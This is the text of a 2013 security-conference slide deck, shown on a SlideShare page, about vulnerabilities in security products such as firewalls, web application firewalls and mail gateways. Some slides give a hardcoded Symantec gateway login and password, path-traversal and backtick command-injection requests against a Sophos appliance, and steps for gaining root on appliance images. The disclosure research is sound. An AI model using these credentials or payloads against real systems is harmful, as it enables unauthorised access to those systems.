Alexander Antukh

1,180 views

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,180
On SlideShare
0
From Embeds
0
Number of Embeds
3
Actions
Shares
0
Downloads
0
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Alexander Antukh

  1. 1. Insecurity SoftwarePHDays 2013Version: 1.0Author: Alexander AntukhResponsible: Alexander AntukhDate: 24.05.2013Confidentiality: Public
  2. 2. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reservedAgenda• Introduction• What is Security Software• Historical review• The Question• The Answer• Vuln, where art thou?• Afterword• QA2
  3. 3. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reservedSEC Consult – Who we areCanadaIndiaSingaporeSEC Consult OfficeSEC Consult HeadquarterOther SEC Consult ClientsLithuaniaGermanyAustria Central and Easter Europe• Leading international applicationsecurity consultancy• Founded 2002• Headquarters near Vienna,Austria• Delivery Centers in Austria,Germany, Lithuania and Singapore• Strong customer base in Centraland Eastern Europe• Increasing customer base of clientswith global business (esp. out ofTop-10 US and European softwarevendors)• 35+ application security experts• Industry focus banks, softwarevendors, governmentUSA3
  4. 4. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reservedAlexander Antukh – Whoami• Security consultant• Offensive Security Certified Expert• Defcon Moscow Local GroupCoordinator*kidhacker4
  5. 5. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reservedAgenda• Introduction• What is Security Software• Historical review• The Question• The Answer• Vuln, where art thou?• Afterword• QA5
  6. 6. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reservedWhat is Security Software“A generic term referring to any computer program or library whichpurpose is to (help to) secure a computer system or a computer network”6
  7. 7. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reservedWhat is Security Software7The keyword in all the security software is…
  8. 8. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reservedWhat is Security Software8
  9. 9. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reservedWhat is Security Software9In other words, SS is a piece of “anti-evil” software which makes you feelsafe and “anti-bad”
  10. 10. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reservedAgenda• Introduction• What is Security Software• Historical review• The Question• The Answer• Vuln, where art thou?• Afterword• QA10
  11. 11. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reservedHistorical reviewEvolution:Packet filter Stateful FW App layer FWFirst appearance: 1988First *registered* exploit: 1995Objective: control network traffic anddetermine if it’s good enough to passFirewall11
  12. 12. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reservedHistorical reviewFirst appearance: 1986First *registered* hack: 1999Objective: monitor for maliciousactivities or policy violations(heuristics, signatures...)ID(P)SCeci n‘est pas un firewall... Statistical anomaly-based Signature-based12 Passive (detection) Reactive (prevention)
  13. 13. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reservedHistorical reviewAntiSpam evolution:DelFirst appearance: Monty PythonFirst PoC: 1978Industrial scale: 1994 - ...CAN-SPAM Act of 2003: spam is legalKeywords BlacklistsAuth Protocol analysis Filtering13
  14. 14. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved14Historical reviewFirst registered hack: 1903(OSVDB-ID: 79399, 79400)Anti-sniffing“… I did it for the lulz”Today it’s netconfiguration, encryption andIDS/IPSNevil Maskelyne
  15. 15. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved15Historical reviewFirst „viruses“: 1971First viruses: mid-1980sFirst AVs: mid-1980s (CHK4BOMB,BOMBSQUAD, DRPROTECT)Virus evolution:Benign Destructive $$$$$Anti-virus
  16. 16. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved16Historical reviewAV companies don’t stand still…
  17. 17. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved17Historical review… neither do other SS products
  18. 18. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved18Agenda• Introduction• What is Security Software• Historical review• The Question• The Answer• Vuln, where art thou?• Afterward• QA
  19. 19. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved19The questionDo you know anybody less boring?What if the SS is vulnerable itself?
  20. 20. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved20The answer*sorry for my English
  21. 21. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved21Déjà vu (slide from PHDays 2012)• Reverse engineering• Checkpoint – Client side remote command executionMultiple Checkpoint appliancesCVE-2011-1827• Fuzzing• F5 Firepass – Remote command executionF5 FirePass SSL VPN – Remote command executionCVE-2012-1777• Application testing• Microsoft ASP.Net – Authentication bypassMicrosoft Security Bulletin MS11-100 - CriticalVulnerabilities in .NET Framework Could Allow Elevation ofPrivilege (2638420)CVE-2011-3416Security software products will be the target of the trade ... soon !
  22. 22. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved22The time has come!
  23. 23. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reservedThe answer• Symantec Messaging Gateway• Backdoor by designCode execution• F5 BIG-IP• SQL Injection, XXEPasswords… Root access• Applicure dotDefender WAF• Format string vulnerabilityCode execution• Sophos Web Protection Appliance• LFI, OS Command InjectionCommand execution, admin account pwnSecurity software products are the target of the trade ... already!23
  24. 24. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reservedThe answer“... inbound and outbound messaging security,with effective and accurate real-time antispamand antivirus protection, advanced contentfiltering, data loss prevention, and emailencryption ...“Symantec Messaging Gatewayv.9.5.xSSH?!Login: supportMD5: 52e3bbafc627009ac13caff1200a0dbfPassword: symantec24
  25. 25. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reservedThe answerF5 BIG-IP <= 11.2.0“... from load balancing and service offloadingto acceleration and security, the BIG-IP systemdelivers agility—and ensures your applicationsare fast, secure, and available ...“25
  26. 26. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reservedThe answer“... from load balancing and service offloadingto acceleration and security, the BIG-IP systemdelivers agility—and ensures your applicationsare fast, secure, and available ...“sam/admin/reports/php/getSettings.php 26F5 BIG-IP <= 11.2.0
  27. 27. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reservedThe answer“... dotDefender is a web applicationsecurity solution (a Web ApplicationFirewall, or WAF) that offersstrong, proactive security for your websitesand web applications ...“Web Attack?27AppliCure dotDefender WAF <= 4.26
  28. 28. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved28The answer• %MAILTO_BLOCK% - email entered in the “Emailaddress for blocked request report” field• %RID% - reference ID• %IP% - servers IP address• %DATE_TIME% - date of blocked requestError page can be configured in different ways:Vars to be added to the body of a custom page:Looks nice…AppliCure dotDefender WAF <= 4.26
  29. 29. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved29The answerFormat string injection• Variables• Buffer• ...• AP_PRINTF()check for format string vulnerabilities… should be<%IP%> Host: …Algorithm:%666dxBAxADxBExEF…AppliCure dotDefender WAF <= 4.26
  30. 30. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved30The answer“... our award-winning Secure Web Gatewayappliances make web protection easy. They arequick to setup, simple to manage and makepolicy administration a snap, even for non-technical users...“Sophos Web ProtectionAppliance <= 3.7.8.1https://<host>/cgi-bin/patience.cgi?id=..?id=../../persist/config/shared.conf%00?id=../../log/ui_access_log%00"https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0)Gecko/20100101 Firefox/19.0"Passwords!
  31. 31. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved31The answer` POST /index.php?c=diagnostic_tools HTTP/1.1...action=wget&section=configuration&STYLE=<validsessid>&url=%60sleep%205%60Diagnostic Tools“... our award-winning Secure Web Gatewayappliances make web protection easy. They arequick to setup, simple to manage and makepolicy administration a snap, even for non-technical users...“Sophos Web ProtectionAppliance <= 3.7.8.1
  32. 32. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved32The answer` https://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60Block page (%%user_workstation%%“)“... our award-winning Secure Web Gatewayappliances make web protection easy. They arequick to setup, simple to manage and makepolicy administration a snap, even for non-technical users...“Sophos Web ProtectionAppliance <= 3.7.8.1
  33. 33. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved33The answerPOST /index.php?c=local_site_list_editor HTTP/1.1...STYLE=<validsessid>&action=save&entries=[{"url"%3a+".`sleep+10`",+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}]Local Site List`“... our award-winning Secure Web Gatewayappliances make web protection easy. They arequick to setup, simple to manage and makepolicy administration a snap, even for non-technical users...“Sophos Web ProtectionAppliance <= 3.7.8.1
  34. 34. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved34The answerSophos Web ProtectionAppliance <= 3.7.8.1
  35. 35. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved35Agenda• Introduction• What is Security Software• Historical review• The Question• The Answer• Vuln, where art thou?• Afterword• QA
  36. 36. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reservedVuln, where art thou?• Methods for identifying usable bugs in “Software products”• Applicaton testing and Fuzzing• Reverse engineering• Source code analysis• A short note on so called “security scanning” tools36
  37. 37. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reservedVuln, where art thou?• The workflow for the appliance analysis is pretty simple!• get a virtual appliance demo version• install the appliance• add the .vmdk to another vm and mount it there (or use a linux fsdriver that can mount vmdk files)• add a new user to /etc/passwd, or change UID/shell/password ofexisting users (or maybe change the sudoers file, sshd config)• start the appliance again and log in :)• look at the services that are running (and their configuration)• pwnage ;)37
  38. 38. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reservedVuln, where art thou?*Move two matches to make it three equal squares38
  39. 39. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved39Start me up!Vuln, where art thou?
  40. 40. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved40Agenda• Introduction• What is Security Software• Historical review• The Question• The Answer• Vuln, where art thou?• Afterword• QA
  41. 41. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved41Sometimes it’s easier to find the vulnerability than itmight be expected . . .*doesn’t exist yetAnd now for something completely different
  42. 42. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reservedQA

×